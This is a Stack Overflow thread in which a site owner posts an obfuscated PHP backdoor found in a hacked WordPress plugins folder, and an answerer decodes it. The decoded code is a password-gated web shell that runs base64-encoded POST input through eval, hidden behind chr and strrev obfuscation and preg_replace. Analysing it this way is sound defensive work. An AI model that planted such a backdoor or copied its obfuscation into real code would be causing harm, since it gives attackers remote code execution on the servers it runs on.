-1

Just a quick question.... I found a malicious file on a site (since removed) but I'm wondering what it's doing. Below is the code, any insight would be greatly appreciated. 

function myfunc () {
$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';
$_myfunc2 = "\x63\x68\x72";
$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);
$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));
$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");
$_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65");
$_g1qm5($_g1qm3('e'.$_g1qm2(47).'*./'),"@$_g1qm6($_g1qm4(\"JGxvZyA9ICdwcnQnOyBpZiAoIWlzc2V0KCRfU0VTU0lPTikpIHsgCXNlc3Npb25fc3RhcnQoKTsgfSBpZiAoaXNzZXQoJF9TRVNTSU9OWydsb2cnXSkgJiYgKCRfU0VTU0lPTlsnbG9nJ10gPT0gJGxvZykpIHsgCWlmIChpc3NldCgkX1BPU1RbJ210cSddKSkgeyAgCQkkcHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnbXRxJ10pOyAJCWV2YWwoJHB0KTsgCQlleGl0OyAJfSB9IGlmIChpc3NldCgkX1BPU1RbJ3B3eCddKSAmJiAobWQ1KCRfUE9TVFsncHd4J10pID09ICRfZzFxbTEpKSB7IAkkX1NFU1NJT05bJ2xvZyddID0gJGxvZzsgCWV4aXQ7IH0K\"))",'');} @_g1qm0();
}
Jonathan Leffler
  • 730,956
  • 141
  • 904
  • 1,278
JChops
  • 69
  • 1
  • 9
  • Firstly I think this question would be better suited elsewhere, maybe on code review or security. And where does `$_g1qm2` come from? That is being set out of the blue. – chriz Dec 16 '15 at 14:58
  • 5
    @chriz It's not on topic on code review either! This isn't OP's code, and well... even if it was we don't do code explanation, we review code. Security would be the good fit, there already are questions like that there. – IEatBagels Dec 16 '15 at 15:04
  • It's not on-topic on Code Review either. – Mast Dec 16 '15 at 15:04
  • Gah, well I will just get back into my hole! p.s. not saying I am right, but I did imply _maybe_. None the less it shouldn't be here. – chriz Dec 16 '15 at 15:05
  • 1
    @chriz It's alright, it indeed shouldn't be on StackOverflow. You tried something! :p Both Code Review and Programmers have guides on what's on-topic. You should check them if you want to propose migrations! :) – IEatBagels Dec 16 '15 at 15:09
  • if you do a recursive de-obfuscation you will see the original code (although some variables are missing from the code posted) and see what it does, see for example [PHPDeObfuscator](https://github.com/foo123/PHPDeobfuscator) for an example how to do it – Nikos M. Dec 16 '15 at 15:10
  • 2
    @TopinFrassi Goes to show how much time I spend elsewhere! I will definitely check out those topic pages. Thanks for understanding. – chriz Dec 16 '15 at 15:11
  • 2
    @TopinFrassi: Good luck grokking the on-topic rules for Programmers! I don't think even the mods have figured it out yet... – Lightness Races in Orbit Dec 16 '15 at 15:16
  • 2
    @LightnessRacesinOrbit In case of doubt, I hop in The Whiteboard and let them decide :p – IEatBagels Dec 16 '15 at 15:17
  • thanks for the help guys sorry if this is in the wrong place. I'm just trying to find out if that code is trying to link to another file on the site that I may need to investigate. – JChops Dec 16 '15 at 15:22
  • @TopinFrassi: It's really not that much better there ;) – Lightness Races in Orbit Dec 16 '15 at 17:19

1 Answers1

1

This code is not complete but from what I've decoded it is:

$log = 'prt'; 

if (!isset($_SESSION)) {    
  session_start(); 
} 

if (isset($_SESSION['log']) && ($_SESSION['log'] == $log)) {    
    if (isset($_POST['mtq'])) {                 
        $pt = base64_decode($_POST['mtq']);         
        eval($pt);      
        exit;   
    }
 } 

 if (isset($_POST['pwx']) && (md5($_POST['pwx']) == $_g1qm1)) { 
    $_SESSION['log'] = $log;    exit; 
 }

So in simple words it looks from mtq param from POST request and executes it in shell. Data comes in base64 encoded format. It also stores one variable in session on key log

Also

$_myfunc2 = "\x63\x68\x72"; it is decoded to chr which is function in PHP that returns character based on ASCII code.

$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';

looks like md5 hash but I'm not sure

$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);

It is $_g1qm3 is strrev function

$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));

It is base64_decode()

$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");

It's preg_replace()

 $_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65")

It's eval()

Robert
  • 19,800
  • 5
  • 55
  • 85
  • Thanks guys, this was in a wordpress file that was sitting in the plugins folder of a site that recently got hacked. The code posted is incorrect, sorry, function starts out as function $_g1qm0 () { $_g1qm1 = '63ebc49bf6d9fc5bed6af96a894db6cd'; $_g1qm2 = "\x63\x68\x72"; – JChops Dec 16 '15 at 15:17
  • I've updated answer. – Robert Dec 16 '15 at 15:24